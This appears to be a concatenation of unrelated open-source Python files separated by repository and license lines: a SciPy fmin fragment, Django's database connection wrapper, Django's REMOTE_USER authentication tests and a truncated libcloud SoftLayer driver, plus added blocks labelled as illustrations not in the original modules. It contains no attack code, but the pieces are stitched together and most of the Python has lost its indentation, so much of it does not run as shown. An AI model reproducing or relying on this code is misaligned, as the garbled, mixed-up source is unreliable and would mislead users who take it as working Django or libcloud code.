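        return (x[0] - 1.0) ** 2 + (x[1] - 2.0) ** 2

    _x_min = _so.fmin(_demo_of, _nm.array([0.0, 0.0]), maxiter=100, disp=False)
    print(_x_min)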
|
bsd-3-clause
|
frankvdp/django
|
django/db/backends/base/base.py
|
10
|
24014
|
import copy
import time
import warnings
from collections import deque
from contextlib import contextmanager
import _thread
import pytz
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.db import DEFAULT_DB_ALIAS
from django.db.backends import utils
from django.db.backends.base.validation import BaseDatabaseValidation
from django.db.backends.signals import connection_created
from django.db.transaction import TransactionManagementError
from django.db.utils import DatabaseError, DatabaseErrorWrapper
from django.utils import timezone
from django.utils.functional import cached_property
NO_DB_ALIAS = '__no_db__'
class BaseDatabaseWrapper:
"""Represent a database connection."""
# Mapping of Field objects to their column types.
data_types = {}
# Mapping of Field objects to their SQL suffix such as AUTOINCREMENT.
data_types_suffix = {}
# Mapping of Field objects to their SQL for CHECK constraints.
data_type_check_constraints = {}
ops = None
vendor = 'unknown'
display_name = 'unknown'
SchemaEditorClass = None
# Classes instantiated in __init__().
client_class = None
creation_class = None
features_class = None
introspection_class = None
ops_class = None
validation_class = BaseDatabaseValidation
queries_limit = 9000
def __init__(self, settings_dict, alias=DEFAULT_DB_ALIAS,
allow_thread_sharing=False):
# Connection related attributes.
# The underlying database connection.
self.connection = None
# `settings_dict` should be a dictionary containing keys such as
# NAME, USER, etc. It's called `settings_dict` instead of `settings`
# to disambiguate it from Django settings modules.
self.settings_dict = settings_dict
self.alias = alias
# Query logging in debug mode or when explicitly enabled.
self.queries_log = deque(maxlen=self.queries_limit)
self.force_debug_cursor = False
# Transaction related attributes.
# Tracks if the connection is in autocommit mode. Per PEP 249, by
# default, it isn't.
self.autocommit = False
# Tracks if the connection is in a transaction managed by 'atomic'.
self.in_atomic_block = False
# Increment to generate unique savepoint ids.
self.savepoint_state = 0
# List of savepoints created by 'atomic'.
self.savepoint_ids = []
# Tracks if the outermost 'atomic' block should commit on exit,
# ie. if autocommit was active on entry.
self.commit_on_exit = True
# Tracks if the transaction should be rolled back to the next
# available savepoint because of an exception in an inner block.
self.needs_rollback = False
# Connection termination related attributes.
self.close_at = None
self.closed_in_transaction = False
self.errors_occurred = False
# Thread-safety related attributes.
self.allow_thread_sharing = allow_thread_sharing
self._thread_ident = _thread.get_ident()
# A list of no-argument functions to run when the transaction commits.
# Each entry is an (sids, func) tuple, where sids is a set of the
# active savepoint IDs when this function was registered.
self.run_on_commit = []
# Should we run the on-commit hooks the next time set_autocommit(True)
# is called?
self.run_commit_hooks_on_set_autocommit_on = False
# A stack of wrappers to be invoked around execute()/executemany()
# calls. Each entry is a function taking five arguments: execute, sql,
# params, many, and context. It's the function's responsibility to
# call execute(sql, params, many, context).
self.execute_wrappers = []
self.client = self.client_class(self)
self.creation = self.creation_class(self)
self.features = self.features_class(self)
self.introspection = self.introspection_class(self)
self.ops = self.ops_class(self)
self.validation = self.validation_class(self)
def ensure_timezone(self):
"""
Ensure the connection's timezone is set to `self.timezone_name` and
return whether it changed or not.
"""
return False
@cached_property
def timezone(self):
"""
Time zone for datetimes stored as naive values in the database.
Return a tzinfo object or None.
This is only needed when time zone support is enabled and the database
doesn't support time zones. (When the database supports time zones,
the adapter handles aware datetimes so Django doesn't need to.)
"""
if not settings.USE_TZ:
return None
elif self.features.supports_timezones:
return None
elif self.settings_dict['TIME_ZONE'] is None:
return timezone.utc
else:
return pytz.timezone(self.settings_dict['TIME_ZONE'])
@cached_property
def timezone_name(self):
"""
Name of the time zone of the database connection.
"""
if not settings.USE_TZ:
return settings.TIME_ZONE
elif self.settings_dict['TIME_ZONE'] is None:
return 'UTC'
else:
return self.settings_dict['TIME_ZONE']
@property
def queries_logged(self):
return self.force_debug_cursor or settings.DEBUG
@property
def queries(self):
if len(self.queries_log) == self.queries_log.maxlen:
warnings.warn(
"Limit for query logging exceeded, only the last {} queries "
"will be returned.".format(self.queries_log.maxlen))
return list(self.queries_log)
# ##### Backend-specific methods for creating connections and cursors #####
def get_connection_params(self):
"""Return a dict of parameters suitable for get_new_connection."""
raise NotImplementedError('subclasses of BaseDatabaseWrapper may require a get_connection_params() method')
def get_new_connection(self, conn_params):
"""Open a connection to the database."""
raise NotImplementedError('subclasses of BaseDatabaseWrapper may require a get_new_connection() method')
def init_connection_state(self):
"""Initialize the database connection settings."""
raise NotImplementedError('subclasses of BaseDatabaseWrapper may require an init_connection_state() method')
def create_cursor(self, name=None):
"""Create a cursor. Assume that a connection is established."""
raise NotImplementedError('subclasses of BaseDatabaseWrapper may require a create_cursor() method')
# ##### Backend-specific methods for creating connections #####
def connect(self):
"""Connect to the database. Assume that the connection is closed."""
# Check for invalid configurations.
self.check_settings()
# In case the previous connection was closed while in an atomic block
self.in_atomic_block = False
self.savepoint_ids = []
self.needs_rollback = False
# Reset parameters defining when to close the connection
max_age = self.settings_dict['CONN_MAX_AGE']
self.close_at = None if max_age is None else time.time() + max_age
self.closed_in_transaction = False
self.errors_occurred = False
# Establish the connection
conn_params = self.get_connection_params()
self.connection = self.get_new_connection(conn_params)
self.set_autocommit(self.settings_dict['AUTOCOMMIT'])
self.init_connection_state()
connection_created.send(sender=self.__class__, connection=self)
self.run_on_commit = []
def check_settings(self):
if self.settings_dict['TIME_ZONE'] is not None:
if not settings.USE_TZ:
raise ImproperlyConfigured(
"Connection '%s' cannot set TIME_ZONE because USE_TZ is "
"False." % self.alias)
elif self.features.supports_timezones:
raise ImproperlyConfigured(
"Connection '%s' cannot set TIME_ZONE because its engine "
"handles time zones conversions natively." % self.alias)
def ensure_connection(self):
"""Guarantee that a connection to the database is established."""
if self.connection is None:
with self.wrap_database_errors:
self.connect()
# ##### Backend-specific wrappers for PEP-249 connection methods #####
def _prepare_cursor(self, cursor):
"""
Validate the connection is usable and perform database cursor wrapping.
"""
self.validate_thread_sharing()
if self.queries_logged:
wrapped_cursor = self.make_debug_cursor(cursor)
else:
wrapped_cursor = self.make_cursor(cursor)
return wrapped_cursor
def _cursor(self, name=None):
self.ensure_connection()
with self.wrap_database_errors:
return self._prepare_cursor(self.create_cursor(name))
def _commit(self):
if self.connection is not None:
with self.wrap_database_errors:
return self.connection.commit()
def _rollback(self):
if self.connection is not None:
with self.wrap_database_errors:
return self.connection.rollback()
def _close(self):
if self.connection is not None:
with self.wrap_database_errors:
return self.connection.close()
# ##### Generic wrappers for PEP-249 connection methods #####
def cursor(self):
"""Create a cursor, opening a connection if necessary."""
return self._cursor()
def commit(self):
"""Commit a transaction and reset the dirty flag."""
self.validate_thread_sharing()
self.validate_no_atomic_block()
self._commit()
# A successful commit means that the database connection works.
self.errors_occurred = False
self.run_commit_hooks_on_set_autocommit_on = True
def rollback(self):
"""Roll back a transaction and reset the dirty flag."""
self.validate_thread_sharing()
self.validate_no_atomic_block()
self._rollback()
# A successful rollback means that the database connection works.
self.errors_occurred = False
self.needs_rollback = False
self.run_on_commit = []
def close(self):
"""Close the connection to the database."""
self.validate_thread_sharing()
self.run_on_commit = []
# Don't call validate_no_atomic_block() to avoid making it difficult
# to get rid of a connection in an invalid state. The next connect()
# will reset the transaction state anyway.
if self.closed_in_transaction or self.connection is None:
return
try:
self._close()
finally:
if self.in_atomic_block:
self.closed_in_transaction = True
self.needs_rollback = True
else:
self.connection = None
# ##### Backend-specific savepoint management methods #####
def _savepoint(self, sid):
with self.cursor() as cursor:
cursor.execute(self.ops.savepoint_create_sql(sid))
def _savepoint_rollback(self, sid):
with self.cursor() as cursor:
cursor.execute(self.ops.savepoint_rollback_sql(sid))
def _savepoint_commit(self, sid):
with self.cursor() as cursor:
cursor.execute(self.ops.savepoint_commit_sql(sid))
def _savepoint_allowed(self):
# Savepoints cannot be created outside a transaction
return self.features.uses_savepoints and not self.get_autocommit()
# ##### Generic savepoint management methods #####
def savepoint(self):
"""
Create a savepoint inside the current transaction. Return an
identifier for the savepoint that will be used for the subsequent
rollback or commit. Do nothing if savepoints are not supported.
"""
if not self._savepoint_allowed():
return
thread_ident = _thread.get_ident()
tid = str(thread_ident).replace('-', '')
self.savepoint_state += 1
sid = "s%s_x%d" % (tid, self.savepoint_state)
self.validate_thread_sharing()
self._savepoint(sid)
return sid
def savepoint_rollback(self, sid):
"""
Roll back to a savepoint. Do nothing if savepoints are not supported.
"""
if not self._savepoint_allowed():
return
self.validate_thread_sharing()
self._savepoint_rollback(sid)
# Remove any callbacks registered while this savepoint was active.
self.run_on_commit = [
(sids, func) for (sids, func) in self.run_on_commit if sid not in sids
]
def savepoint_commit(self, sid):
"""
Release a savepoint. Do nothing if savepoints are not supported.
"""
if not self._savepoint_allowed():
return
self.validate_thread_sharing()
self._savepoint_commit(sid)
def clean_savepoints(self):
"""
Reset the counter used to generate unique savepoint ids in this thread.
"""
self.savepoint_state = 0
# ##### Backend-specific transaction management methods #####
def _set_autocommit(self, autocommit):
"""
Backend-specific implementation to enable or disable autocommit.
"""
raise NotImplementedError('subclasses of BaseDatabaseWrapper may require a _set_autocommit() method')
# ##### Generic transaction management methods #####
def get_autocommit(self):
"""Get the autocommit state."""
self.ensure_connection()
return self.autocommit
def set_autocommit(self, autocommit, force_begin_transaction_with_broken_autocommit=False):
"""
Enable or disable autocommit.
The usual way to start a transaction is to turn autocommit off.
SQLite does not properly start a transaction when disabling
autocommit. To avoid this buggy behavior and to actually enter a new
transaction, an explicit BEGIN is required. Using
force_begin_transaction_with_broken_autocommit=True will issue an
explicit BEGIN with SQLite. This option will be ignored for other
backends.
"""
self.validate_no_atomic_block()
self.ensure_connection()
start_transaction_under_autocommit = (
force_begin_transaction_with_broken_autocommit and not autocommit and
hasattr(self, '_start_transaction_under_autocommit')
)
if start_transaction_under_autocommit:
self._start_transaction_under_autocommit()
else:
self._set_autocommit(autocommit)
self.autocommit = autocommit
if autocommit and self.run_commit_hooks_on_set_autocommit_on:
self.run_and_clear_commit_hooks()
self.run_commit_hooks_on_set_autocommit_on = False
def get_rollback(self):
"""Get the "needs rollback" flag -- for *advanced use* only."""
if not self.in_atomic_block:
raise TransactionManagementError(
"The rollback flag doesn't work outside of an 'atomic' block.")
return self.needs_rollback
def set_rollback(self, rollback):
"""
Set or unset the "needs rollback" flag -- for *advanced use* only.
"""
if not self.in_atomic_block:
raise TransactionManagementError(
"The rollback flag doesn't work outside of an 'atomic' block.")
self.needs_rollback = rollback
def validate_no_atomic_block(self):
"""Raise an error if an atomic block is active."""
if self.in_atomic_block:
raise TransactionManagementError(
"This is forbidden when an 'atomic' block is active.")
def validate_no_broken_transaction(self):
if self.needs_rollback:
raise TransactionManagementError(
"An error occurred in the current transaction. You can't "
"execute queries until the end of the 'atomic' block.")
# ##### Foreign key constraints checks handling #####
@contextmanager
def constraint_checks_disabled(self):
"""
Disable foreign key constraint checking.
"""
disabled = self.disable_constraint_checking()
try:
yield
finally:
if disabled:
self.enable_constraint_checking()
def disable_constraint_checking(self):
"""
Backends can implement as needed to temporarily disable foreign key
constraint checking. Should return True if the constraints were
disabled and will need to be reenabled.
"""
return False
def enable_constraint_checking(self):
"""
Backends can implement as needed to re-enable foreign key constraint
checking.
"""
pass
def check_constraints(self, table_names=None):
"""
Backends can override this method if they can apply constraint
checking (e.g. via "SET CONSTRAINTS ALL IMMEDIATE"). Should raise an
IntegrityError if any invalid foreign key references are encountered.
"""
pass
# ##### Connection termination handling #####
def is_usable(self):
"""
Test if the database connection is usable.
This method may assume that self.connection is not None.
Actual implementations should take care not to raise exceptions
as that may prevent Django from recycling unusable connections.
"""
raise NotImplementedError(
"subclasses of BaseDatabaseWrapper may require an is_usable() method")
def close_if_unusable_or_obsolete(self):
"""
Close the current connection if unrecoverable errors have occurred
or if it outlived its maximum age.
"""
if self.connection is not None:
# If the application didn't restore the original autocommit setting,
# don't take chances, drop the connection.
if self.get_autocommit() != self.settings_dict['AUTOCOMMIT']:
self.close()
return
# If an exception other than DataError or IntegrityError occurred
# since the last commit / rollback, check if the connection works.
if self.errors_occurred:
if self.is_usable():
self.errors_occurred = False
else:
self.close()
return
if self.close_at is not None and time.time() >= self.close_at:
self.close()
return
# ##### Thread safety handling #####
def validate_thread_sharing(self):
"""
Validate that the connection isn't accessed by a thread other than the
one which originally created it, unless the connection was explicitly
authorized to be shared between threads (via the `allow_thread_sharing`
property). Raise an exception if the validation fails.
"""
if not (self.allow_thread_sharing or self._thread_ident == _thread.get_ident()):
raise DatabaseError(
"DatabaseWrapper objects created in a "
"thread can only be used in that same thread. The object "
"with alias '%s' was created in thread id %s and this is "
"thread id %s."
% (self.alias, self._thread_ident, _thread.get_ident())
)
# ##### Miscellaneous #####
def prepare_database(self):
"""
Hook to do any database check or preparation, generally called before
migrating a project or an app.
"""
pass
@cached_property
def wrap_database_errors(self):
"""
Context manager and decorator that re-throws backend-specific database
exceptions using Django's common wrappers.
"""
return DatabaseErrorWrapper(self)
def chunked_cursor(self):
"""
Return a cursor that tries to avoid caching in the database (if
supported by the database), otherwise return a regular cursor.
"""
return self.cursor()
def make_debug_cursor(self, cursor):
"""Create a cursor that logs all queries in self.queries_log."""
return utils.CursorDebugWrapper(cursor, self)
def make_cursor(self, cursor):
"""Create a cursor without debug logging."""
return utils.CursorWrapper(cursor, self)
@contextmanager
def temporary_connection(self):
"""
Context manager that ensures that a connection is established, and
if it opened one, closes it to avoid leaving a dangling connection.
This is useful for operations outside of the request-response cycle.
Provide a cursor: with self.temporary_connection() as cursor: ...
"""
must_close = self.connection is None
try:
with self.cursor() as cursor:
yield cursor
finally:
if must_close:
self.close()
@property
def _nodb_connection(self):
"""
Return an alternative connection to be used when there is no need to
access the main database, specifically for test db creation/deletion.
This also prevents the production database from being exposed to
potential child threads while (or after) the test database is destroyed.
Refs #10868, #17786, #16969.
"""
return self.__class__(
{**self.settings_dict, 'NAME': None},
alias=NO_DB_ALIAS,
allow_thread_sharing=False,
)
def schema_editor(self, *args, **kwargs):
"""
Return a new instance of this backend's SchemaEditor.
"""
if self.SchemaEditorClass is None:
raise NotImplementedError(
'The SchemaEditorClass attribute of this database wrapper is still None')
return self.SchemaEditorClass(self, *args, **kwargs)
def on_commit(self, func):
if self.in_atomic_block:
# Transaction in progress; save for execution on commit.
self.run_on_commit.append((set(self.savepoint_ids), func))
elif not self.get_autocommit():
raise TransactionManagementError('on_commit() cannot be used in manual transaction management')
else:
# No transaction in progress and in autocommit mode; execute
# immediately.
func()
def run_and_clear_commit_hooks(self):
self.validate_no_atomic_block()
current_run_on_commit = self.run_on_commit
self.run_on_commit = []
while current_run_on_commit:
sids, func = current_run_on_commit.pop(0)
func()
@contextmanager
def execute_wrapper(self, wrapper):
"""
Return a context manager under which the wrapper is applied to suitable
database query executions.
"""
self.execute_wrappers.append(wrapper)
try:
yield
finally:
self.execute_wrappers.pop()
def copy(self, alias=None, allow_thread_sharing=None):
"""
Return a copy of this connection.
For tests that require two connections to the same database.
"""
settings_dict = copy.deepcopy(self.settings_dict)
if alias is None:
alias = self.alias
if allow_thread_sharing is None:
allow_thread_sharing = self.allow_thread_sharing
return type(self)(settings_dict, alias, allow_thread_sharing)
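# --- Hedged illustration (not part of the original module) ---
# A minimal sketch of an execute() wrapper matching the contract documented
# for self.execute_wrappers above: it receives the next `execute` callable
# plus sql, params, many and context, and must call
# execute(sql, params, many, context). The logging target is an assumption;
# any callable with this signature works.
def _demo_print_sql_wrapper(execute, sql, params, many, context):
    # Log the statement about to run, then delegate to the wrapped execute().
    print('executing: %s' % sql)
    return execute(sql, params, many, context)

# Hypothetical usage with a connection instance:
#     with connection.execute_wrapper(_demo_print_sql_wrapper):
#         cursor.execute('SELECT 1')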
|
bsd-3-clause
|
nthiep/global-ssh-server
|
lib/python2.7/site-packages/django/contrib/auth/tests/remote_user.py
|
9
|
8779
|
from datetime import datetime
from django.conf import settings
from django.contrib.auth import authenticate
from django.contrib.auth.backends import RemoteUserBackend
from django.contrib.auth.models import User, AnonymousUser
from django.contrib.auth.tests.utils import skipIfCustomUser
from django.test import TestCase
from django.utils import timezone
@skipIfCustomUser
class RemoteUserTest(TestCase):
urls = 'django.contrib.auth.tests.urls'
middleware = 'django.contrib.auth.middleware.RemoteUserMiddleware'
backend = 'django.contrib.auth.backends.RemoteUserBackend'
# Usernames to be passed in REMOTE_USER for the test_known_user test case.
known_user = 'knownuser'
known_user2 = 'knownuser2'
def setUp(self):
self.curr_middleware = settings.MIDDLEWARE_CLASSES
self.curr_auth = settings.AUTHENTICATION_BACKENDS
settings.MIDDLEWARE_CLASSES += (self.middleware,)
settings.AUTHENTICATION_BACKENDS += (self.backend,)
def test_no_remote_user(self):
"""
Tests requests where no remote user is specified and ensures that no
users get created.
"""
num_users = User.objects.count()
response = self.client.get('/remote_user/')
self.assertTrue(response.context['user'].is_anonymous())
self.assertEqual(User.objects.count(), num_users)
response = self.client.get('/remote_user/', REMOTE_USER=None)
self.assertTrue(response.context['user'].is_anonymous())
self.assertEqual(User.objects.count(), num_users)
response = self.client.get('/remote_user/', REMOTE_USER='')
self.assertTrue(response.context['user'].is_anonymous())
self.assertEqual(User.objects.count(), num_users)
def test_unknown_user(self):
"""
Tests the case where the username passed in the header does not exist
as a User.
"""
num_users = User.objects.count()
response = self.client.get('/remote_user/', REMOTE_USER='newuser')
self.assertEqual(response.context['user'].username, 'newuser')
self.assertEqual(User.objects.count(), num_users + 1)
User.objects.get(username='newuser')
# Another request with same user should not create any new users.
response = self.client.get('/remote_user/', REMOTE_USER='newuser')
self.assertEqual(User.objects.count(), num_users + 1)
def test_known_user(self):
"""
Tests the case where the username passed in the header is a valid User.
"""
User.objects.create(username='knownuser')
User.objects.create(username='knownuser2')
num_users = User.objects.count()
response = self.client.get('/remote_user/', REMOTE_USER=self.known_user)
self.assertEqual(response.context['user'].username, 'knownuser')
self.assertEqual(User.objects.count(), num_users)
# Test that a different user passed in the headers causes the new user
# to be logged in.
response = self.client.get('/remote_user/', REMOTE_USER=self.known_user2)
self.assertEqual(response.context['user'].username, 'knownuser2')
self.assertEqual(User.objects.count(), num_users)
def test_last_login(self):
"""
Tests that a user's last_login is set the first time they make a
request but not updated in subsequent requests with the same session.
"""
user = User.objects.create(username='knownuser')
# Set last_login to something so we can determine if it changes.
default_login = datetime(2000, 1, 1)
if settings.USE_TZ:
default_login = default_login.replace(tzinfo=timezone.utc)
user.last_login = default_login
user.save()
response = self.client.get('/remote_user/', REMOTE_USER=self.known_user)
self.assertNotEqual(default_login, response.context['user'].last_login)
user = User.objects.get(username='knownuser')
user.last_login = default_login
user.save()
response = self.client.get('/remote_user/', REMOTE_USER=self.known_user)
self.assertEqual(default_login, response.context['user'].last_login)
def test_header_disappears(self):
"""
Tests that a logged in user is logged out automatically when
the REMOTE_USER header disappears during the same browser session.
"""
User.objects.create(username='knownuser')
# Known user authenticates
response = self.client.get('/remote_user/', REMOTE_USER=self.known_user)
self.assertEqual(response.context['user'].username, 'knownuser')
# During the session, the REMOTE_USER header disappears. Should trigger logout.
response = self.client.get('/remote_user/')
self.assertEqual(response.context['user'].is_anonymous(), True)
# verify the remoteuser middleware will not remove a user
# authenticated via another backend
User.objects.create_user(username='modeluser', password='foo')
self.client.login(username='modeluser', password='foo')
authenticate(username='modeluser', password='foo')
response = self.client.get('/remote_user/')
self.assertEqual(response.context['user'].username, 'modeluser')
def test_user_switch_forces_new_login(self):
"""
Tests that if the username in the header changes between requests,
the original user is logged out.
"""
User.objects.create(username='knownuser')
# Known user authenticates
response = self.client.get('/remote_user/',
**{'REMOTE_USER': self.known_user})
self.assertEqual(response.context['user'].username, 'knownuser')
# During the session, the REMOTE_USER changes to a different user.
response = self.client.get('/remote_user/',
**{'REMOTE_USER': "newnewuser"})
# Ensure that the current user is not the prior remote_user
# In backends that create a new user, username is "newnewuser"
# In backends that do not create new users, it is '' (anonymous user)
self.assertNotEqual(response.context['user'].username, 'knownuser')
def tearDown(self):
"""Restores settings to avoid breaking other tests."""
settings.MIDDLEWARE_CLASSES = self.curr_middleware
settings.AUTHENTICATION_BACKENDS = self.curr_auth
class RemoteUserNoCreateBackend(RemoteUserBackend):
"""Backend that doesn't create unknown users."""
create_unknown_user = False
@skipIfCustomUser
class RemoteUserNoCreateTest(RemoteUserTest):
"""
Contains the same tests as RemoteUserTest, but using a custom auth backend
class that doesn't create unknown users.
"""
backend =\
'django.contrib.auth.tests.remote_user.RemoteUserNoCreateBackend'
def test_unknown_user(self):
num_users = User.objects.count()
response = self.client.get('/remote_user/', REMOTE_USER='newuser')
self.assertTrue(response.context['user'].is_anonymous())
self.assertEqual(User.objects.count(), num_users)
class CustomRemoteUserBackend(RemoteUserBackend):
"""
Backend that overrides RemoteUserBackend methods.
"""
def clean_username(self, username):
"""
Grabs username before the @ character.
"""
return username.split('@')[0]
def configure_user(self, user):
"""
Sets user's email address.
"""
user.email = '[email protected]'
user.save()
return user
@skipIfCustomUser
class RemoteUserCustomTest(RemoteUserTest):
"""
Tests a custom RemoteUserBackend subclass that overrides the clean_username
and configure_user methods.
"""
backend =\
'django.contrib.auth.tests.remote_user.CustomRemoteUserBackend'
# REMOTE_USER strings with email addresses for the custom backend to
# clean.
known_user = '[email protected]'
known_user2 = '[email protected]'
def test_known_user(self):
"""
The strings passed in REMOTE_USER should be cleaned and the known users
should not have been configured with an email address.
"""
super(RemoteUserCustomTest, self).test_known_user()
self.assertEqual(User.objects.get(username='knownuser').email, '')
self.assertEqual(User.objects.get(username='knownuser2').email, '')
def test_unknown_user(self):
"""
The unknown user created should be configured with an email address.
"""
super(RemoteUserCustomTest, self).test_unknown_user()
newuser = User.objects.get(username='newuser')
self.assertEqual(newuser.email, '[email protected]')
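# --- Hedged illustration (not part of the original test module) ---
# A minimal sketch of the settings a deployment would need for the
# REMOTE_USER flow exercised above. Only the middleware and backend paths
# used by RemoteUserTest come from this module; the surrounding session and
# authentication middleware entries are the usual Django defaults and are
# assumptions here.
EXAMPLE_MIDDLEWARE_CLASSES = (
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.auth.middleware.RemoteUserMiddleware',
)
EXAMPLE_AUTHENTICATION_BACKENDS = (
    'django.contrib.auth.backends.RemoteUserBackend',
)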
|
agpl-3.0
|
mtekel/libcloud
|
libcloud/compute/drivers/softlayer.py
|
22
|
16262
|
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Softlayer driver
"""
import time
try:
from Crypto.PublicKey import RSA
crypto = True
except ImportError:
crypto = False
from libcloud.common.softlayer import SoftLayerConnection, SoftLayerException
from libcloud.compute.types import Provider, NodeState
from libcloud.compute.base import NodeDriver, Node, NodeLocation, NodeSize, \
NodeImage, KeyPair
from libcloud.compute.types import KeyPairDoesNotExistError
DEFAULT_DOMAIN = 'example.com'
DEFAULT_CPU_SIZE = 1
DEFAULT_RAM_SIZE = 2048
DEFAULT_DISK_SIZE = 100
DATACENTERS = {
'hou02': {'country': 'US'},
'sea01': {'country': 'US', 'name': 'Seattle - West Coast U.S.'},
'wdc01': {'country': 'US', 'name': 'Washington, DC - East Coast U.S.'},
'dal01': {'country': 'US'},
'dal02': {'country': 'US'},
'dal04': {'country': 'US'},
'dal05': {'country': 'US', 'name': 'Dallas - Central U.S.'},
'dal06': {'country': 'US'},
'dal07': {'country': 'US'},
'sjc01': {'country': 'US', 'name': 'San Jose - West Coast U.S.'},
'sng01': {'country': 'SG', 'name': 'Singapore - Southeast Asia'},
'ams01': {'country': 'NL', 'name': 'Amsterdam - Western Europe'},
'tok02': {'country': 'JP', 'name': 'Tokyo - Japan'},
}
NODE_STATE_MAP = {
'RUNNING': NodeState.RUNNING,
'HALTED': NodeState.UNKNOWN,
'PAUSED': NodeState.UNKNOWN,
'INITIATING': NodeState.PENDING
}
SL_BASE_TEMPLATES = [
{
'name': '1 CPU, 1GB ram, 25GB',
'ram': 1024,
'disk': 25,
'cpus': 1,
}, {
'name': '1 CPU, 1GB ram, 100GB',
'ram': 1024,
'disk': 100,
'cpus': 1,
}, {
'name': '1 CPU, 2GB ram, 100GB',
'ram': 2 * 1024,
'disk': 100,
'cpus': 1,
}, {
'name': '1 CPU, 4GB ram, 100GB',
'ram': 4 * 1024,
'disk': 100,
'cpus': 1,
}, {
'name': '2 CPU, 2GB ram, 100GB',
'ram': 2 * 1024,
'disk': 100,
'cpus': 2,
}, {
'name': '2 CPU, 4GB ram, 100GB',
'ram': 4 * 1024,
'disk': 100,
'cpus': 2,
}, {
'name': '2 CPU, 8GB ram, 100GB',
'ram': 8 * 1024,
'disk': 100,
'cpus': 2,
}, {
'name': '4 CPU, 4GB ram, 100GB',
'ram': 4 * 1024,
'disk': 100,
'cpus': 4,
}, {
'name': '4 CPU, 8GB ram, 100GB',
'ram': 8 * 1024,
'disk': 100,
'cpus': 4,
}, {
'name': '6 CPU, 4GB ram, 100GB',
'ram': 4 * 1024,
'disk': 100,
'cpus': 6,
}, {
'name': '6 CPU, 8GB ram, 100GB',
'ram': 8 * 1024,
'disk': 100,
'cpus': 6,
}, {
'name': '8 CPU, 8GB ram, 100GB',
'ram': 8 * 1024,
'disk': 100,
'cpus': 8,
}, {
'name': '8 CPU, 16GB ram, 100GB',
'ram': 16 * 1024,
'disk': 100,
'cpus': 8,
}]
SL_TEMPLATES = {}
for i, template in enumerate(SL_BASE_TEMPLATES):
# Add local disk templates
local = template.copy()
local['local_disk'] = True
SL_TEMPLATES[i] = local
class SoftLayerNodeDriver(NodeDriver):
"""
SoftLayer node driver
Extra node attributes:
- password: root password
- hourlyRecurringFee: hourly price (if applicable)
- recurringFee : flat rate (if applicable)
- recurringMonths : The number of months in which the recurringFee
will be incurred.
"""
connectionCls = SoftLayerConnection
name = 'SoftLayer'
website = 'http://www.softlayer.com/'
type = Provider.SOFTLAYER
features = {'create_node': ['generates_password', 'ssh_key']}
def _to_node(self, host):
try:
password = \
host['operatingSystem']['passwords'][0]['password']
except (IndexError, KeyError):
password = None
hourlyRecurringFee = host.get('billingItem', {}).get(
'hourlyRecurringFee', 0)
recurringFee = host.get('billingItem', {}).get('recurringFee', 0)
recurringMonths = host.get('billingItem', {}).get('recurringMonths', 0)
createDate = host.get('createDate', None)
# When machine is launching it gets state halted
# we change this to pending
state = NODE_STATE_MAP.get(host['powerState']['keyName'],
NodeState.UNKNOWN)
if not password and state == NodeState.UNKNOWN:
state = NODE_STATE_MAP['INITIATING']
public_ips = []
private_ips = []
if 'primaryIpAddress' in host:
public_ips.append(host['primaryIpAddress'])
if 'primaryBackendIpAddress' in host:
private_ips.append(host['primaryBackendIpAddress'])
image = host.get('operatingSystem', {}).get('softwareLicense', {}) \
.get('softwareDescription', {}) \
.get('longDescription', None)
return Node(
id=host['id'],
name=host['fullyQualifiedDomainName'],
state=state,
public_ips=public_ips,
private_ips=private_ips,
driver=self,
extra={
'hostname': host['hostname'],
'fullyQualifiedDomainName': host['fullyQualifiedDomainName'],
'password': password,
'maxCpu': host.get('maxCpu', None),
'datacenter': host.get('datacenter', {}).get('longName', None),
'maxMemory': host.get('maxMemory', None),
'image': image,
'hourlyRecurringFee': hourlyRecurringFee,
'recurringFee': recurringFee,
'recurringMonths': recurringMonths,
'created': createDate,
}
)
def destroy_node(self, node):
self.connection.request(
'SoftLayer_Virtual_Guest', 'deleteObject', id=node.id
)
return True
def reboot_node(self, node):
self.connection.request(
'SoftLayer_Virtual_Guest', 'rebootSoft', id=node.id
)
return True
def ex_stop_node(self, node):
self.connection.request(
'SoftLayer_Virtual_Guest', 'powerOff', id=node.id
)
return True
def ex_start_node(self, node):
self.connection.request(
'SoftLayer_Virtual_Guest', 'powerOn', id=node.id
)
return True
def _get_order_information(self, node_id, timeout=1200, check_interval=5):
mask = {
'billingItem': '',
'powerState': '',
'operatingSystem': {'passwords': ''},
'provisionDate': '',
}
for i in range(0, timeout, check_interval):
res = self.connection.request(
'SoftLayer_Virtual_Guest',
'getObject',
id=node_id,
object_mask=mask
).object
if res.get('provisionDate', None):
return res
time.sleep(check_interval)
raise SoftLayerException('Timeout on getting node details')
def create_node(self, **kwargs):
"""Create a new SoftLayer node
@inherits: :class:`NodeDriver.create_node`
:keyword ex_domain: e.g. libcloud.org
:type ex_domain: ``str``
:keyword ex_cpus: e.g. 2
:type ex_cpus: ``int``
:keyword ex_disk: e.g. 100
:type ex_disk: ``int``
:keyword ex_ram: e.g. 2048
:type ex_ram: ``int``
:keyword ex_bandwidth: e.g. 100
:type ex_bandwidth: ``int``
:keyword ex_local_disk: e.g. True
:type ex_local_disk: ``bool``
:keyword ex_datacenter: e.g. Dal05
:type ex_datacenter: ``str``
:keyword ex_os: e.g. UBUNTU_LATEST
:type ex_os: ``str``
:keyword ex_keyname: The name of the key pair
:type ex_keyname: ``str``
"""
name = kwargs['name']
os = 'DEBIAN_LATEST'
if 'ex_os' in kwargs:
os = kwargs['ex_os']
elif 'image' in kwargs:
os = kwargs['image'].id
size = kwargs.get('size', NodeSize(id=123, name='Custom', ram=None,
disk=None, bandwidth=None,
price=None,
driver=self.connection.driver))
ex_size_data = SL_TEMPLATES.get(int(size.id)) or {}
# plan keys are ints
cpu_count = kwargs.get('ex_cpus') or ex_size_data.get('cpus') or \
DEFAULT_CPU_SIZE
ram = kwargs.get('ex_ram') or ex_size_data.get('ram') or \
DEFAULT_RAM_SIZE
